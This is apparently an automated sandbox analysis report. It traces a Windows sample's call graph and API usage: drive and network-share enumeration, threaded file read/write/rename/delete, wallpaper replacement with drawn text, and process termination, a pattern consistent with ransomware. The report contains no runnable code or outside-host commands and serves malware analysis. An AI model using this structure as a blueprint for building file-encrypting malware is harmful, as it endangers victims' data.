4127->4128 4129 271fc5 4128->4129 4130 273c6b RtlFreeHeap 4129->4130 4130->4123 4287 273dd9 GetCommandLineW CommandLineToArgvW 4131->4287 4133 2713aa 4136 271fdc 4133->4136 4134 271376 4134->4133 4288 273dcb LocalFree 4134->4288 4137 271ff9 4136->4137 4138 273c1e 3 API calls 4137->4138 4139 272015 4138->4139 4140 272079 4139->4140 4289 274e64 4139->4289 4140->3884 4142 27202f 4143 2751b7 3 API calls 4142->4143 4144 272059 4143->4144 4144->4140 4145 2755af 6 API calls 4144->4145 4146 272073 4145->4146 4147 273c6b RtlFreeHeap 4146->4147 4147->4140 4149 2722a9 4148->4149 4150 2747ef RegQueryValueExW 4148->4150 4149->3969 4149->3970 4151 27483a RegCloseKey 4150->4151 4152 274809 4150->4152 4151->4149 4152->4151 4153 273c1e 3 API calls 4152->4153 4154 274814 4153->4154 4154->4151 4155 27481b RegQueryValueExW 4154->4155 4155->4151 4156 274831 4155->4156 4157 273c6b RtlFreeHeap 4156->4157 4158 274837 4157->4158 4158->4151 4173 275775 4159->4173 4161 27572d 4161->3984 4163 275b00 4162->4163 4164 275af9 4162->4164 4165 273c1e 3 API calls 4163->4165 4164->3986 4166 275b0d 4165->4166 4166->4164 4167 275722 9 API calls 4166->4167 4168 275b36 4167->4168 4169 2758f5 9 API calls 4168->4169 4169->4164 4171 2724bc 4170->4171 4172 27486e RegSetValueExW RegCloseKey 4170->4172 4171->3992 4171->3994 4172->4171 4176 2758f5 4173->4176 4177 27590a 4176->4177 4185 275919 4176->4185 4188 275886 4177->4188 4180 27592b 4186 275948 4180->4186 4193 2746df 4180->4193 4181 27590f 4182 275784 4181->4182 4191 27448c RtlInitializeCriticalSection 4181->4191 4182->4161 4192 273ee1 RtlEnterCriticalSection 4185->4192 4186->4182 4201 27458e RtlLeaveCriticalSection 4186->4201 4189 2746df 6 API calls 4188->4189 4190 275897 4189->4190 4190->4181 4191->4185 4192->4180 4202 274a62 4193->4202 4195 2746f3 4195->4186 4196 2746ed 4196->4195 4197 274914 CryptAcquireContextW 4196->4197 4198 27493a CryptGenRandom 4196->4198 4199 274930 4197->4199 4200 27492e 4197->4200 4198->4186 4199->4198 4200->4186 4201->4182 4203 274a9d 4202->4203 4204 274a70 4202->4204 4203->4196 4204->4203 4206 274aab 4204->4206 4208 274ab6 4206->4208 4207 274b55 timeBeginPeriod timeGetTime Sleep timeGetTime 4207->4208 4208->4207 4209 274b42 4208->4209 4209->4204 4216 274c6f GetWindowsDirectoryW 4210->4216 4212 27496c 4213 274974 GetVolumeInformationW 4212->4213 4214 274998 4212->4214 4215 273c6b RtlFreeHeap 4213->4215 4214->4028 4215->4214 4217 274c82 4216->4217 4218 274c80 4216->4218 4219 273c1e 3 API calls 4217->4219 4218->4212 4220 274c8c 4219->4220 4221 274c93 GetWindowsDirectoryW 4220->4221 4222 274ca5 4220->4222 4221->4222 4223 274c9f 4221->4223 4222->4212 4224 273c6b RtlFreeHeap 4223->4224 4224->4222 4226 2725f2 4225->4226 4227 2725ee 4225->4227 4247 27470f 4226->4247 4227->4046 4230 273c1e 3 API calls 4232 272614 4230->4232 4231 27470f 9 API calls 4231->4232 4232->4227 4232->4231 4234 2755c0 4233->4234 4235 273bc0 RtlAllocateHeap 4234->4235 4237 2755c6 4234->4237 4236 2755e7 4235->4236 4236->4237 4251 27536c WideCharToMultiByte 4236->4251 4237->4045 4240 275607 4240->4237 4242 275632 4240->4242 4243 273c6b RtlFreeHeap 4240->4243 4241 2751b7 3 API calls 4241->4240 4244 275641 4242->4244 4245 273c6b RtlFreeHeap 4242->4245 4243->4242 4259 273c08 RtlFreeHeap 4244->4259 4245->4244 4248 27471f 4247->4248 4249 2725fe 4247->4249 4250 2758f5 9 API calls 4248->4250 4249->4227 4249->4230 4250->4249 4252 27538d 4251->4252 4258 2753b5 4251->4258 4253 273c1e 3 API calls 4252->4253 4254 275393 4253->4254 4255 27539a WideCharToMultiByte 4254->4255 4254->4258 4256 2753af 4255->4256 4255->4258 4257 273c6b RtlFreeHeap 4256->4257 4257->4258 4258->4240 4258->4241 4259->4237 4261 271cd4 4260->4261 4262 2747ce 8 API calls 4261->4262 4263 271d0d 4262->4263 4264 271d2d 4263->4264 4265 2747ce 8 API calls 4263->4265 4266 273c1e 3 API calls 4264->4266 4268 271d52 4264->4268 4265->4264 4267 271d4b 4266->4267 4267->4268 4269 271d76 _snwprintf 4267->4269 4268->4102 4268->4109 4270 271df1 4269->4270 4271 275ae5 12 API calls 4270->4271 4272 271e00 4271->4272 4273 273c6b RtlFreeHeap 4272->4273 4274 271e08 4273->4274 4274->4268 4275 27484c 3 API calls 4274->4275 4276 271e2a 4275->4276 4276->4268 4277 27484c 3 API calls 4276->4277 4277->4268 4279 274f49 4278->4279 4281 274f1e 4278->4281 4279->4107 4281->4279 4282 273c6b RtlFreeHeap 4281->4282 4283 274f50 4281->4283 4282->4281 4284 274f64 4283->4284 4286 274fda 4283->4286 4285 273c1e 3 API calls 4284->4285 4284->4286 4285->4286 4286->4281 4287->4134 4288->4133 4290 273c1e 3 API calls 4289->4290 4291 274e79 4290->4291 4292 274cad 6 API calls 4291->4292 4295 274ea0 4291->4295 4293 274e91 4292->4293 4294 273c6b RtlFreeHeap 4293->4294 4296 274e99 4294->4296 4295->4142 4296->4295 4297 273c6b RtlFreeHeap 4296->4297 4297->4295 4299 273c1e 3 API calls 4298->4299 4301 2765f3 4299->4301 4300 27363d 4306 27667a WNetOpenEnumW 4300->4306 4301->4300 4302 27666b 4301->4302 4303 27662a GetDriveTypeW 4301->4303 4319 276299 4301->4319 4304 273c6b RtlFreeHeap 4302->4304 4303->4301 4304->4300 4307 27669e 4306->4307 4311 273647 4306->4311 4308 273c1e 3 API calls 4307->4308 4309 2766b1 4308->4309 4310 2766b8 WNetCloseEnum 4309->4310 4317 2766c5 4309->4317 4310->4311 4311->3611 4312 2766c7 WNetEnumResourceW 4312->4317 4313 276723 4314 273c6b RtlFreeHeap 4313->4314 4315 276729 WNetCloseEnum 4314->4315 4315->4311 4317->4312 4317->4313 4318 27667a 35 API calls 4317->4318 4464 27651d 4317->4464 4318->4317 4339 27272e 4319->4339 4320 2762c0 4330 2762dc 4320->4330 4346 27658b 4320->4346 4323 276499 4323->4301 4324 27647f 4324->4323 4325 273c6b RtlFreeHeap 4324->4325 4325->4324 4326 273c6b RtlFreeHeap 4326->4330 4327 27634f FindFirstFileW 4327->4330 4328 276452 FindNextFileW 4329 27646a FindClose 4328->4329 4328->4330 4329->4330 4330->4324 4330->4326 4330->4327 4330->4328 4330->4329 4331 27658b 3 API calls 4330->4331 4332 272712 7 API calls 4330->4332 4335 27272e 5 API calls 4330->4335 4356 2735a8 4330->4356 4360 272ead 4330->4360 4369 2735df 4330->4369 4331->4330 4332->4330 4335->4330 4340 272740 4339->4340 4341 273c1e 3 API calls 4340->4341 4342 272753 4341->4342 4343 27276e GetFileAttributesW 4342->4343 4345 272786 4342->4345 4344 273c6b RtlFreeHeap 4343->4344 4344->4345 4345->4320 4347 273c1e 3 API calls 4346->4347 4348 276596 4347->4348 4349 2762d4 4348->4349 4350 2751b7 3 API calls 4348->4350 4351 272712 4349->4351 4350->4349 4372 27351c 4351->4372 4357 2735d3 4356->4357 4358 2735b1 4356->4358 4357->4330 4358->4357 4397 27364f 4358->4397 4400 2728a9 4360->4400 4363 272ee8 4363->4330 4365 272eda 4366 272ee2 4365->4366 4425 2761b4 PostQueuedCompletionStatus 4365->4425 4366->4363 4419 27287f 4366->4419 4450 272f5e GetSystemInfo CreateFileW 4369->4450 4371 2735f0 4371->4330 4373 273529 4372->4373 4374 273c1e 3 API calls 4373->4374 4376 27353c 4374->4376 4375 27271d 4384 2734ad 4375->4384 4376->4375 4394 2764a0 CreateFileW 4376->4394 4378 27356b 4379 273c6b RtlFreeHeap 4378->4379 4380 273573 4379->4380 4380->4375 4395 2764c6 WriteFile 4380->4395 4382 273596 4383 273db7 FindCloseChangeNotification 4382->4383 4383->4375 4385 2734b9 4384->4385 4386 273c1e 3 API calls 4385->4386 4388 2734cc 4386->4388 4387 272725 4387->4330 4388->4387 4396 2764a0 CreateFileW 4388->4396 4390 2734fb 4391 273c6b RtlFreeHeap 4390->4391 4392 273503 4391->4392 4392->4387 4393 273db7 FindCloseChangeNotification 4392->4393 4393->4387 4394->4378 4395->4382 4396->4390 4398 276299 35 API calls 4397->4398 4399 273694 4398->4399 4399->4357 4401 2728bb 4400->4401 4426 27616f 4401->4426 4403 2728d5 4404 2728d9 RtlGetLastWin32Error 4403->4404 4407 272900 4403->4407 4411 2728e3 4404->4411 4416 272912 4404->4416 4409 272916 RtlGetLastWin32Error 4407->4409 4410 27296a 4407->4410 4415 27292d GetFileAttributesW 4407->4415 4417 27293d SetFileAttributesW 4407->4417 4429 2761ea CreateFileW 4407->4429 4408 27616f RtlAllocateHeap 4408->4411 4409->4407 4412 27297a 4409->4412 4439 272986 4410->4439 4411->4403 4411->4408 4438 274954 Sleep 4411->4438 4435 276183 4412->4435 4415->4407 4415->4412 4416->4363 4418 27603a CreateIoCompletionPort 4416->4418 4417->4407 4417->4412 4418->4365 4420 272894 4419->4420 4445 2761ce 4420->4445 4423 276183 RtlFreeHeap 4424 2728a3 4423->4424 4424->4363 4425->4366 4427 273bc0 RtlAllocateHeap 4426->4427 4428 27617f 4427->4428 4428->4403 4430 27621e 4429->4430 4434 27621a 4429->4434 4431 2751b7 3 API calls 4430->4431 4432 276226 4431->4432 4433 273db7 FindCloseChangeNotification 4432->4433 4432->4434 4433->4434 4434->4407 4444 273c08 RtlFreeHeap 4435->4444 4437 276193 4437->4416 4438->4411 4440 275722 9 API calls 4439->4440 4441 2729bf 4440->4441 4442 2758f5 9 API calls 4441->4442 4443 272a0f 4442->4443 4443->4416 4444->4437 4446 273db7 FindCloseChangeNotification 4445->4446 4447 2761dd 4446->4447 4448 273c6b RtlFreeHeap 4447->4448 4449 27289a 4448->4449 4449->4423 4451 273046 4450->4451 4452 272f9c CreateFileMappingW 4450->4452 4457 273db7 FindCloseChangeNotification 4451->4457 4459 273053 4451->4459 4453 272fbf 4452->4453 4452->4459 4454 273036 4453->4454 4460 272fe0 MapViewOfFile 4453->4460 4454->4451 4456 27303d UnmapViewOfFile 4454->4456 4455 273062 DeleteFileW 4455->4371 4456->4451 4457->4459 4458 273db7 FindCloseChangeNotification 4461 273061 4458->4461 4459->4455 4459->4458 4460->4451 4463 272fff 4460->4463 4461->4455 4462 273009 UnmapViewOfFile 4462->4453 4462->4463 4463->4453 4463->4454 4463->4462 4465 273c1e 3 API calls 4464->4465 4466 27652e 4465->4466 4467 276299 35 API calls 4466->4467 4470 276583 4466->4470 4468 27657d 4467->4468 4469 273c6b RtlFreeHeap 4468->4469 4469->4470 4470->4317 4498 273bdd HeapCreate 4471->4498 4473 27611a 4474 276128 CreateIoCompletionPort 4473->4474 4480 272bd7 4473->4480 4475 27613e 4474->4475 4476 276148 4474->4476 4506 273bfa HeapDestroy 4475->4506 4499 2760be 4476->4499 4480->3905 4480->3906 4482 27615e 4483 273db7 FindCloseChangeNotification 4482->4483 4483->4480 4577 274634 GetSystemInfo 4484->4577 4486 276077 4487 276099 4486->4487 4488 276081 PostQueuedCompletionStatus 4486->4488 4490 27609b 4487->4490 4491 2760a8 4487->4491 4579 274634 GetSystemInfo 4488->4579 4490->4487 4580 274954 Sleep 4490->4580 4578 273bfa HeapDestroy 4491->4578 4494 2760af 4495 273db7 FindCloseChangeNotification 4494->4495 4496 2760b7 4495->4496 4496->3905 4497->3912 4498->4473 4508 274634 GetSystemInfo 4499->4508 4501 276102 4501->4480 4507 273bfa HeapDestroy 4501->4507 4502 2760da CreateThread 4502->4501 4504 2760d3 4502->4504 4510 272c76 4502->4510 4503 273db7 FindCloseChangeNotification 4503->4504 4504->4501 4504->4502 4504->4503 4509 274634 GetSystemInfo 4504->4509 4506->4480 4507->4482 4508->4504 4509->4504 4511 2743c7 11 API calls 4510->4511 4518 272c82 4511->4518 4513 272d2a 4514 27446f 6 API calls 4513->4514 4516 272d33 4514->4516 4515 272cf1 RtlGetLastWin32Error 4515->4518 4518->4513 4518->4515 4523 272a54 4518->4523 4534 272da9 4518->4534 4543 272d3c 4518->4543 4552 272b3a 4518->4552 4562 276197 GetQueuedCompletionStatus 4518->4562 4563 27285d 4518->4563 4524 273db7 FindCloseChangeNotification 4523->4524 4525 272a68 4524->4525 4526 273c1e 3 API calls 4525->4526 4527 272a81 4526->4527 4528 272ab2 4527->4528 4566 2765d1 MoveFileW 4527->4566 4530 27287f 2 API calls 4528->4530 4532 272b31 4530->4532 4531 272aaa 4533 273c6b RtlFreeHeap 4531->4533 4532->4518 4533->4528 4537 272dc4 4534->4537 4536 272df9 4538 272e20 4536->4538 4539 272dfe RtlGetLastWin32Error 4536->4539 4567 27627f WriteFile 4537->4567 4538->4518 4539->4538 4542 272e0a 4539->4542 4542->4536 4568 274954 Sleep 4542->4568 4569 27627f WriteFile 4542->4569 4544 272d5b 4543->4544 4570 27627f WriteFile 4544->4570 4546 272d7c 4547 272da5 4546->4547 4548 272d81 RtlGetLastWin32Error 4546->4548 4547->4518 4548->4547 4551 272d8d 4548->4551 4551->4546 4571 274954 Sleep 4551->4571 4572 27627f WriteFile 4551->4572 4573 27624b ReadFile 4552->4573 4554 272b63 RtlGetLastWin32Error 4555 272b8f 4554->4555 4556 272b5e 4554->4556 4555->4518 4556->4554 4556->4555 4557 272b74 4556->4557 4558 272b91 4556->4558 4557->4556 4574 274954 Sleep 4557->4574 4575 27624b ReadFile 4557->4575 4559 27285d PostQueuedCompletionStatus 4558->4559 4559->4555 4562->4518 4576 2761b4 PostQueuedCompletionStatus 4563->4576 4565 27287a 4565->4518 4566->4531 4567->4536 4568->4542 4569->4542 4570->4546 4571->4551 4572->4551 4573->4556 4574->4557 4575->4557 4576->4565 4577->4486 4578->4494 4579->4486 4580->4490 4582 27470f 9 API calls 4581->4582 4583 2738bb 4582->4583 4584 273c1e 3 API calls 4583->4584 4597 27395c 4583->4597 4586 2738d5 4584->4586 4585 27470f 9 API calls 4585->4586 4586->4585 4587 273921 4586->4587 4586->4597 4615 2749a1 GetTempPathW 4587->4615 4589 273950 4590 273956 4589->4590 4592 27395e 4589->4592 4591 273c6b RtlFreeHeap 4590->4591 4591->4597 4593 273c1e 3 API calls 4592->4593 4594 27397b 4593->4594 4595 273c6b RtlFreeHeap 4594->4595 4594->4597 4596 27398a 4595->4596 4598 273c6b RtlFreeHeap 4596->4598 4597->3926 4598->4597 4600 273894 SystemParametersInfoW 4599->4600 4601 273716 LocalAlloc 4599->4601 4600->3932 4603 273796 4601->4603 4604 27379d GlobalAlloc 4601->4604 4603->4604 4604->4600 4605 2737d3 GetDIBits 4604->4605 4605->4600 4606 2737f0 CreateFileW 4605->4606 4606->4600 4607 273813 WriteFile 4606->4607 4608 273876 4607->4608 4609 273859 WriteFile 4607->4609 4611 273db7 FindCloseChangeNotification 4608->4611 4609->4608 4610 273879 WriteFile 4609->4610 4610->4608 4612 273897 4610->4612 4611->4600 4613 273db7 FindCloseChangeNotification 4612->4613 4614 27389c GlobalFree 4613->4614 4614->4600 4616 2749b4 4615->4616 4617 2749b2 4615->4617 4618 273c1e 3 API calls 4616->4618 4617->4589 4619 2749be 4618->4619 4620 2749c5 GetTempPathW 4619->4620 4621 2749d7 4619->4621 4620->4621 4622 2749d1 4620->4622 4621->4589 4623 273c6b RtlFreeHeap 4622->4623 4623->4621 4625 271cb0 21 API calls 4624->4625 4626 2726cd 4625->4626 4633 27270b 4626->4633 4635 273074 4626->4635 4628 2726dd 4629 2726fe 4628->4629 4649 276826 4628->4649 4631 273c6b RtlFreeHeap 4629->4631 4629->4633 4631->4633 4633->3938 4634 273c6b RtlFreeHeap 4634->4629 4636 273086 4635->4636 4637 273c1e 3 API calls 4636->4637 4638 273093 4637->4638 4639 27470f 9 API calls 4638->4639 4648 273499 4638->4648 4640 273238 4639->4640 4641 27470f 9 API calls 4640->4641 4642 2733bf 4641->4642 4643 27470f 9 API calls 4642->4643 4644 2733e1 4643->4644 4645 273423 4644->4645 4646 27470f 9 API calls 4644->4646 4647 27470f 9 API calls 4645->4647 4646->4644 4647->4648 4648->4628 4651 27684e 4649->4651 4650 2769aa RtlGetLastWin32Error 4650->4651 4651->4650 4652 2726f6 4651->4652 4653 2769d8 4651->4653 4652->4634 4653->4652 4655 27673f 4653->4655 4658 27675b 4655->4658 4656 273c1e 3 API calls 4656->4658 4657 2767b8 4660 273c1e 3 API calls 4657->4660 4663 276811 4657->4663 4658->4656 4658->4657 4659 273c6b RtlFreeHeap 4658->4659 4658->4663 4659->4658 4661 2767e9 4660->4661 4662 273c6b RtlFreeHeap 4661->4662 4661->4663 4662->4663 4663->4652 4665 273d6c GetKeyboardLayoutList 4664->4665 4665->3943 4665->3949 4667 275414 4666->4667 4673 2753ce 4666->4673 4676 273c08 RtlFreeHeap 4667->4676 4669 27541f 4677 273bfa HeapDestroy 4669->4677 4671 275426 4671->3952 4672 273c6b RtlFreeHeap 4672->4673 4673->4667 4673->4672 4675 273c08 RtlFreeHeap 4673->4675 4675->4673 4676->4669 4677->4671 4741 271142 4742 274cad 6 API calls 4741->4742 4743 271151 4742->4743 4744 274cff 6 API calls 4743->4744 4748 271178 4743->4748 4745 271169 4744->4745 4746 273c6b RtlFreeHeap 4745->4746 4747 271171 4746->4747 4747->4748 4749 273c6b RtlFreeHeap 4747->4749 4749->4748 4750 27266e 4751 27267e 4750->4751 4752 272690 OpenProcess 4751->4752 4755 2726b2 4751->4755 4753 2726a3 TerminateProcess 4752->4753 4752->4755 4754 273db7 FindCloseChangeNotification 4753->4754 4754->4755 4678 275bcd 4679 275bd6 4678->4679 4681 275bf3 4679->4681 4684 275dcf 4679->4684 4696 275d23 4681->4696 4685 275dfb 4684->4685 4687 275d23 9 API calls 4685->4687 4700 275fb3 4685->4700 4704 275f08 4685->4704 4708 275c28 4685->4708 4712 275f7a 4685->4712 4716 275fec 4685->4716 4720 275cdf 4685->4720 4724 275f41 4685->4724 4728 275c61 4685->4728 4686 275e97 4686->4679 4687->4686 4697 275d40 4696->4697 4732 276025 4697->4732 4699 275c17 GetProcAddress 4701 275fd0 4700->4701 4702 275dcf 8 API calls 4701->4702 4703 275fe5 LoadLibraryA 4702->4703 4703->4686 4705 275f25 4704->4705 4706 275dcf 8 API calls 4705->4706 4707 275f3a LoadLibraryA 4706->4707 4707->4686 4709 275c45 4708->4709 4710 275dcf 8 API calls 4709->4710 4711 275c5a LoadLibraryA 4710->4711 4711->4686 4713 275f97 4712->4713 4714 275dcf 8 API calls 4713->4714 4715 275fac LoadLibraryA 4714->4715 4715->4686 4717 276009 4716->4717 4718 275dcf 8 API calls 4717->4718 4719 27601e LoadLibraryA 4718->4719 4719->4686 4721 275cfb 4720->4721 4722 275dcf 8 API calls 4721->4722 4723 275d10 LoadLibraryA 4722->4723 4723->4686 4725 275f5e 4724->4725 4726 275dcf 8 API calls 4725->4726 4727 275f73 LoadLibraryA 4726->4727 4727->4686 4729 275c7e 4728->4729 4730 275dcf 8 API calls 4729->4730 4731 275c93 LoadLibraryA 4730->4731 4731->4686 4733 275dcf 8 API calls 4732->4733 4734 276035 LoadLibraryA 4733->4734 4734->4699 4756 27102c 4757 274cad 6 API calls 4756->4757 4758 27103a 4757->4758 4759 274569 GetNativeSystemInfo 4760 275d17 4763 275d54 4760->4763 4766 2742e5 GetPEB 4763->4766 4765 275d21 4766->4765 4767 275cd3 4768 275d54 GetPEB 4767->4768 4769 275cdd 4768->4769 4770 271071 4771 274cad 6 API calls 4770->4771 4772 271080 4771->4772 4773 274cff 6 API calls 4772->4773 4776 2710a0 4772->4776 4774 271095 4773->4774 4775 273c6b RtlFreeHeap 4774->4775 4775->4776 4780 272f10 4781 272f1b 4780->4781 4782 272f1f 4780->4782 4782->4781 4784 2764f2 PathFindExtensionW 4782->4784 4785 276507 4784->4785 4785->4781 4786 275c9a 4787 275cb7 4786->4787 4788 275dcf 9 API calls 4787->4788 4789 275ccc 4788->4789

                                                                Control-flow Graph

                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 002739B9
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 002739CE
                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 002739E5
                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 002739F8
                                                                • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00273A04
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00273A17
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00273A20
                                                                • MulDiv.KERNEL32(00000012,00000000,00000048), ref: 00273A2B
                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00273A48
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00273A5B
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00273A64
                                                                • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00273A70
                                                                • GetStockObject.GDI32(00000002), ref: 00273A78
                                                                • FillRect.USER32(00000000,00000000,00000000), ref: 00273A95
                                                                • SetPixel.GDI32(00000000,?,00000000,00000000), ref: 00273B17
                                                                • DrawTextW.USER32(00000000,000000FF,00000000,00000011,?), ref: 00273B65
                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00273B8A
                                                                • DeleteObject.GDI32(?), ref: 00273B9A
                                                                • DeleteObject.GDI32(?), ref: 00273BA3
                                                                • DeleteDC.GDI32(00000000), ref: 00273BAA
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00273BB4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Object$CapsCreateDeleteDevice$CompatibleSelectText$BitmapColorDrawFillFontInfoModeParametersPixelRectReleaseStockSystem
                                                                • String ID:
                                                                • API String ID: 830383330-0
                                                                • Opcode ID: 4eda079fe99c3a5dbe06005b65a0a231dac2a584f17e5d471c61c066cf2688fd
                                                                • Instruction ID: 50989e3602dc4e43eb7a87e982c773125bde0845382cf439e8df249087905e5b
                                                                • Opcode Fuzzy Hash: 4eda079fe99c3a5dbe06005b65a0a231dac2a584f17e5d471c61c066cf2688fd
                                                                • Instruction Fuzzy Hash: 1451B375A01619BFEB04DFA5EC4EFAEBBB9EB48711F204119F505E62D0DB709A008B70

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 58 272f5e-272f96 GetSystemInfo CreateFileW 59 273046 58->59 60 272f9c-272fb9 CreateFileMappingW 58->60 61 273049-27304b 59->61 62 273054-273059 60->62 63 272fbf-272fc4 60->63 61->62 64 27304d-273053 call 273db7 61->64 67 273062-273073 DeleteFileW 62->67 68 27305b-273061 call 273db7 62->68 65 273036-27303b 63->65 66 272fc6-272fc9 63->66 64->62 65->61 69 27303d-273044 UnmapViewOfFile 65->69 71 273032-273034 66->71 72 272fcb-272fd3 66->72 68->67 69->61 71->65 71->72 75 272fd5 72->75 76 272fe0-272ffd MapViewOfFile 72->76 78 272fd7-272fd9 75->78 79 272fdb-272fdd 75->79 76->61 80 272fff-27302e call 273ca5 UnmapViewOfFile 76->80 78->76 78->79 79->76 80->72 83 273030 80->83 83->65 83->71
                                                                APIs
                                                                • GetSystemInfo.KERNEL32(?), ref: 00272F75
                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 00272F8A
                                                                • CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00272FAF
                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,?,?,?), ref: 00272FF3
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0027300D
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0027303E
                                                                • DeleteFileW.KERNEL32(?), ref: 00273065
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$View$CreateUnmap$DeleteInfoMappingSystem
                                                                • String ID:
                                                                • API String ID: 2330190760-0
                                                                • Opcode ID: 9ee3103321a99c363c91bf64d33b84eece3fe2eaf3c2cff5af62b150b3874abd
                                                                • Instruction ID: 14f6fc2917c4231e5687ec24facd93993046e2713ff7a2604c6c1e184c45513b
                                                                • Opcode Fuzzy Hash: 9ee3103321a99c363c91bf64d33b84eece3fe2eaf3c2cff5af62b150b3874abd
                                                                • Instruction Fuzzy Hash: 6B319875A11229ABCB14DFA8DC89DAFBB78EF44750F108119F91DE3240D7708E50DBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 137 276299-2762c4 call 27272e 139 276476-276479 137->139 140 2762ca-2762d9 call 27658b call 272712 137->140 142 27647f 139->142 143 2762ea-2762f0 139->143 155 2762dc-2762e5 140->155 147 276495-276497 142->147 144 2762f2-27630a call 27515c call 273c6b * 2 143->144 145 276331-276333 143->145 166 27630f-276326 144->166 145->147 151 276339-276365 call 275205 call 275098 FindFirstFileW 145->151 149 276481-276494 call 273c6b * 2 147->149 150 276499-27649f 147->150 149->147 151->139 167 27636b-276380 call 2750fb 151->167 159 276473 155->159 159->139 169 27632b-276330 166->169 170 276328 166->170 172 276386-27639b call 2750fb 167->172 173 27644d-276450 167->173 169->145 170->169 172->173 178 2763a1-2763ab 172->178 175 276452-276464 FindNextFileW 173->175 176 27646a-27646d FindClose 173->176 175->167 175->176 176->159 178->173 179 2763b1-2763cd call 27515c 178->179 182 27640f-276430 179->182 183 2763cf-2763e1 call 275098 179->183 182->173 187 276432-27643e 182->187 197 2763e2 call 27272e 183->197 198 2763e2 call 2735a8 183->198 199 276441 call 2735df 187->199 200 276441 call 272ead 187->200 188 2763e5-2763ea 188->173 190 2763ec-276401 call 27658b call 272712 188->190 189 276444-27644a 189->173 193 276404-27640d 190->193 193->173 197->188 198->188 199->189 200->189
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Af'
                                                                • API String ID: 0-414468015
                                                                • Opcode ID: bfb05c84f3b1a0891069ddcd5c2bc167142fbcdd1e04fb256678be917fcbe49c
                                                                • Instruction ID: 3ffdb1b29de75d02b1370e7edc208caeeee454eaacab588b961d48208fd7bef1
                                                                • Opcode Fuzzy Hash: bfb05c84f3b1a0891069ddcd5c2bc167142fbcdd1e04fb256678be917fcbe49c
                                                                • Instruction Fuzzy Hash: 69517471811A1AEFDB10EF64DC49AAEBBB8FF05324F508166E91CE2541E7349E60CF94

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 265 274b55-274b64 timeBeginPeriod timeGetTime 266 274b66-274b76 Sleep timeGetTime 265->266 266->266 267 274b78-274b79 266->267
                                                                APIs
                                                                • timeBeginPeriod.WINMM(00000001,?,00274AC1,00000000,00000000,00000000,?,00000030,00000000,?,?,00275784,?,00000020,00000000), ref: 00274B58
                                                                • timeGetTime.WINMM(?,00275784,?,00000020,00000000,?,0027572D,?,?,00272427,?,0028D620), ref: 00274B5E
                                                                • Sleep.KERNEL32(00000001,?,00275784,?,00000020,00000000,?,0027572D,?,?,00272427,?,0028D620), ref: 00274B68
                                                                • timeGetTime.WINMM(?,00275784,?,00000020,00000000,?,0027572D,?,?,00272427,?,0028D620), ref: 00274B6E
